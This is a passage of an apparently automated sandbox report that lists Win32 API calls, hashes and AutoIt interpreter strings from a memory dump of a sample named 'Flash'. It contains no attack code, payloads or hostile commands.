                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                        • String ID:
                                                        • API String ID: 4124339563-0
                                                        • Opcode ID: 12ef3060c91cf0b76c1fe10c0ef6d0b1bcba6174e73546db93c46c90fad69a5d
                                                        • Instruction ID: c31e872a7d725a63d6ebadcfc593bd52ffa7544dcf6f0bc75aadf4190a0d5ea2
                                                        • Opcode Fuzzy Hash: 12ef3060c91cf0b76c1fe10c0ef6d0b1bcba6174e73546db93c46c90fad69a5d
                                                        • Instruction Fuzzy Hash: 2BA15972108301AFD711DFA4DC08E6BBBB9FF89322F104B19F966961A0D7B1D985CB52
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?), ref: 009D3072
                                                        • DeleteObject.GDI32(00000000), ref: 009D30B8
                                                        • DeleteObject.GDI32(00000000), ref: 009D30C3
                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 009D30CE
                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 009D30D9
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A0C77C
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A0C7B5
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A0CBDE
                                                          • Part of subcall function 009D1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009D2412,?,00000000,?,?,?,?,009D1AA7,00000000,?), ref: 009D1F76
                                                        • SendMessageW.USER32(?,00001053), ref: 00A0CC1B
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A0CC32
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A0CC48
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A0CC53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 464785882-4108050209
                                                        • Opcode ID: 2b8a4621e8cd6d587210112b5941d81c87b2cc77f5c9571a2c0787ca616f03e5
                                                        • Instruction ID: 1795d05a2eb55d2f980ac2cca2c1a91184771ffd1c93d4a00ca758320101fdc3
                                                        • Opcode Fuzzy Hash: 2b8a4621e8cd6d587210112b5941d81c87b2cc77f5c9571a2c0787ca616f03e5
                                                        • Instruction Fuzzy Hash: B612AE34600205EFDB25CF24D884BA6B7B5BF44321F14C66AF895CB2A2C771ED86CB91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 2660009612-1645009161
                                                        • Opcode ID: a1b816fa2074434d2c1dfabe68f0fdc85ef2368d4a81f63a517d5ebf67796958
                                                        • Instruction ID: f01ba051acb755b16d9a30cd38aa5c929e072be7ef0f7cdc84fd1a5c25fa1458
                                                        • Opcode Fuzzy Hash: a1b816fa2074434d2c1dfabe68f0fdc85ef2368d4a81f63a517d5ebf67796958
                                                        • Instruction Fuzzy Hash: 8FA19E31A00249BBCB15AF22DD42FBE3778BF85740F144429F905AB293EBB49E51D790
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 00A47BC8
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A47C87
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00A47CC5
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00A47CD7
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00A47D1D
                                                        • GetClientRect.USER32(00000000,?), ref: 00A47D29
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00A47D6D
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A47D7C
                                                        • GetStockObject.GDI32(00000011), ref: 00A47D8C
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A47D90
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00A47DA0
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A47DA9
                                                        • DeleteDC.GDI32(00000000), ref: 00A47DB2
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A47DDE
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A47DF5
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00A47E30
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A47E44
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A47E55
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00A47E85
                                                        • GetStockObject.GDI32(00000011), ref: 00A47E90
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A47E9B
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00A47EA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 0314692eefbf3307736951ebce995bc8dd2a8dbdf557e41ed793b21405e7fd56
                                                        • Instruction ID: 8f9f71c813fec90dbec9a1c24c42130fc22396b07ace350e9efd979a227150db
                                                        • Opcode Fuzzy Hash: 0314692eefbf3307736951ebce995bc8dd2a8dbdf557e41ed793b21405e7fd56
                                                        • Instruction Fuzzy Hash: 6CA1A1B1A50615BFEB14DBA4DC4AFAF7BB9EB44710F008115FA15A72E0CBB0AD41CB64
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A3B361
                                                        • GetDriveTypeW.KERNEL32(?,00A62C4C,?,\\.\,00A60980), ref: 00A3B43E
                                                        • SetErrorMode.KERNEL32(00000000,00A62C4C,?,\\.\,00A60980), ref: 00A3B59C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 8fb6282dada6b22a8d192bf99f0f39b9d303aed80572e780d77fba36e6634a9b
                                                        • Instruction ID: 66bfaa84ee849ecf9385f20a92bf934b80a79c6925c7d47e38a6932ca57449e5
                                                        • Opcode Fuzzy Hash: 8fb6282dada6b22a8d192bf99f0f39b9d303aed80572e780d77fba36e6634a9b
                                                        • Instruction Fuzzy Hash: AD517531B61209EBCB00EB60CA43A7D77B2BB84740F248816F607A7291E775EE45CB75
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00A5A0F7
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A5A1B0
                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00A5A1CC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: 0
                                                        • API String ID: 2326795674-4108050209
                                                        • Opcode ID: 85687e1a11bc9678418d6f242c213bf1a6243460a3f6c83689985896975ebdca
                                                        • Instruction ID: b9a4bde5f8db45d99b940289c7af63a4f7e8523b507d2bd63d0c489ce8c4aff1
                                                        • Opcode Fuzzy Hash: 85687e1a11bc9678418d6f242c213bf1a6243460a3f6c83689985896975ebdca
                                                        • Instruction Fuzzy Hash: E102CB30208301AFDB25CF14C849FABBBF4FFA5316F048619F999962A1D7B4D949CB52
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00A5AF51
                                                        • SetTextColor.GDI32(?,?), ref: 00A5AF55
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A5AF6B
                                                        • GetSysColor.USER32(0000000F), ref: 00A5AF76
                                                        • CreateSolidBrush.GDI32(?), ref: 00A5AF7B
                                                        • GetSysColor.USER32(00000011), ref: 00A5AF93
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A5AFA1
                                                        • SelectObject.GDI32(?,00000000), ref: 00A5AFB2
                                                        • SetBkColor.GDI32(?,00000000), ref: 00A5AFBB
                                                        • SelectObject.GDI32(?,?), ref: 00A5AFC8
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00A5AFE7
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A5AFFE
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A5B013
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A5B05F
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A5B086
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00A5B0A4
                                                        • DrawFocusRect.USER32(?,?), ref: 00A5B0AF
                                                        • GetSysColor.USER32(00000011), ref: 00A5B0BD
                                                        • SetTextColor.GDI32(?,00000000), ref: 00A5B0C5
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A5B0D9
                                                        • SelectObject.GDI32(?,00A5AC1F), ref: 00A5B0F0
                                                        • DeleteObject.GDI32(?), ref: 00A5B0FB
                                                        • SelectObject.GDI32(?,?), ref: 00A5B101
                                                        • DeleteObject.GDI32(?), ref: 00A5B106
                                                        • SetTextColor.GDI32(?,?), ref: 00A5B10C
                                                        • SetBkColor.GDI32(?,?), ref: 00A5B116
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: d009d59ef151069cf6dc99d48b670c461ea5701c27a9d8b024fc371eb6a8b691
                                                        • Instruction ID: 5b88f18d6b2dd154fa42b7bcf79c740301ea4fc8a8e817095bc2030fb060cd24
                                                        • Opcode Fuzzy Hash: d009d59ef151069cf6dc99d48b670c461ea5701c27a9d8b024fc371eb6a8b691
                                                        • Instruction Fuzzy Hash: 51615B71900218AFDB11DFA4DC48EAFBB79FF08321F118615F916AB2A1D7B19985CF90
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A590EA
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A590FB
                                                        • CharNextW.USER32(0000014E), ref: 00A5912A
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A5916B
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A59181
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A59192
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A591AF
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00A591FB
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A59211
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A59242
                                                        • _memset.LIBCMT ref: 00A59267
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A592B0
                                                        • _memset.LIBCMT ref: 00A5930F
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A59339
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A59391
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00A5943E
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00A59460
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A594AA
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A594D7
                                                        • DrawMenuBar.USER32(?), ref: 00A594E6
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00A5950E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: 45fba1ee286f7ee4bfceb9a7e09f0d5a7ded42cd2c6237007d60adf22fcf421c
                                                        • Instruction ID: ccc37527c28b1455426525cddf7576045a248fcb09d5d14c4dbce95c20a1e1d0
                                                        • Opcode Fuzzy Hash: 45fba1ee286f7ee4bfceb9a7e09f0d5a7ded42cd2c6237007d60adf22fcf421c
                                                        • Instruction Fuzzy Hash: A7E16C74900218EADF21DF94CC84EEF7BB8FB05711F108156FE15AA291D7B48A89DF61
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00A55007
                                                        • GetDesktopWindow.USER32 ref: 00A5501C
                                                        • GetWindowRect.USER32(00000000), ref: 00A55023
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A55085
                                                        • DestroyWindow.USER32(?), ref: 00A550B1
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A550DA
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A550F8
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A5511E
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00A55133
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A55146
                                                        • IsWindowVisible.USER32(?), ref: 00A55166
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A55181
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A55195
                                                        • GetWindowRect.USER32(?,?), ref: 00A551AD
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00A551D3
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00A551ED
                                                        • CopyRect.USER32(?,?), ref: 00A55204
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00A5526F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 6d0e8192af3ae1f857a7ff3e9df9b22ecb51d85b6c06fd1858d8925dac85250d
                                                        • Instruction ID: 0858f88d4ffcac10dee13f01876837bcb1caf7110165d452ca9d4bcd9d271b5f
                                                        • Opcode Fuzzy Hash: 6d0e8192af3ae1f857a7ff3e9df9b22ecb51d85b6c06fd1858d8925dac85250d
                                                        • Instruction Fuzzy Hash: 58B18B71604740AFDB04DF64C854B6BBBE4BF88711F008A1DF9999B291D7B1EC49CB92
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A3499C
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A349C2
                                                        • _wcscpy.LIBCMT ref: 00A349F0
                                                        • _wcscmp.LIBCMT ref: 00A349FB
                                                        • _wcscat.LIBCMT ref: 00A34A11
                                                        • _wcsstr.LIBCMT ref: 00A34A1C
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A34A38
                                                        • _wcscat.LIBCMT ref: 00A34A81
                                                        • _wcscat.LIBCMT ref: 00A34A88
                                                        • _wcsncpy.LIBCMT ref: 00A34AB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: 02303b30cd8ec69d398f1735bd187373075b27e79ecada005bf64f888910438e
                                                        • Instruction ID: 461bd076d5a247d098b0caf6ae76db4912a167a9cc26f43ee49159a95899c430
                                                        • Opcode Fuzzy Hash: 02303b30cd8ec69d398f1735bd187373075b27e79ecada005bf64f888910438e
                                                        • Instruction Fuzzy Hash: 0241F772A00209BBDB15BB748C43FBF7BBCEF85750F104459FA04A6192EB74EA0197A5
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009D2C8C
                                                        • GetSystemMetrics.USER32(00000007), ref: 009D2C94
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009D2CBF
                                                        • GetSystemMetrics.USER32(00000008), ref: 009D2CC7
                                                        • GetSystemMetrics.USER32(00000004), ref: 009D2CEC
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009D2D09
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009D2D19
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009D2D4C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009D2D60
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 009D2D7E
                                                        • GetStockObject.GDI32(00000011), ref: 009D2D9A
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 009D2DA5
                                                          • Part of subcall function 009D2714: GetCursorPos.USER32(?), ref: 009D2727
                                                          • Part of subcall function 009D2714: ScreenToClient.USER32(00A977B0,?), ref: 009D2744
                                                          • Part of subcall function 009D2714: GetAsyncKeyState.USER32(00000001), ref: 009D2769
                                                          • Part of subcall function 009D2714: GetAsyncKeyState.USER32(00000002), ref: 009D2777
                                                        • SetTimer.USER32(00000000,00000000,00000028,009D13C7), ref: 009D2DCC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: e415ab07df53ae616958d8f7efe8f9c9d486fb2e48b07647041de36a493f6b78
                                                        • Instruction ID: 43b77880da1ab8df66c1def15c296a606cbf103af4dd008c39f196785a16fa76
                                                        • Opcode Fuzzy Hash: e415ab07df53ae616958d8f7efe8f9c9d486fb2e48b07647041de36a493f6b78
                                                        • Instruction Fuzzy Hash: 24B17071A5020A9FDB14DFA8DD49BAE77B4FB58310F10821AFA15E72D0DBB4A851CF60
                                                        APIs
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        • GetForegroundWindow.USER32(00A60980,?,?,?,?,?), ref: 009F04E3
                                                        • IsWindow.USER32(?), ref: 00A266BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$Foreground_memmove
                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                        • API String ID: 3828923867-1919597938
                                                        • Opcode ID: 861d46a1314526904a81ab09466feb42be077e7850a0a6f73205c3fe6dbfd39a
                                                        • Instruction ID: 6910cd587d2ad72a2b348cbbc003a53da607357f43592afd5f92dfec0e167936
                                                        • Opcode Fuzzy Hash: 861d46a1314526904a81ab09466feb42be077e7850a0a6f73205c3fe6dbfd39a
                                                        • Instruction Fuzzy Hash: DCD13630105356DFDB08EF24D980AAABBB5BF94344F104A39F595832A2DB30FD99CB91
                                                        APIs
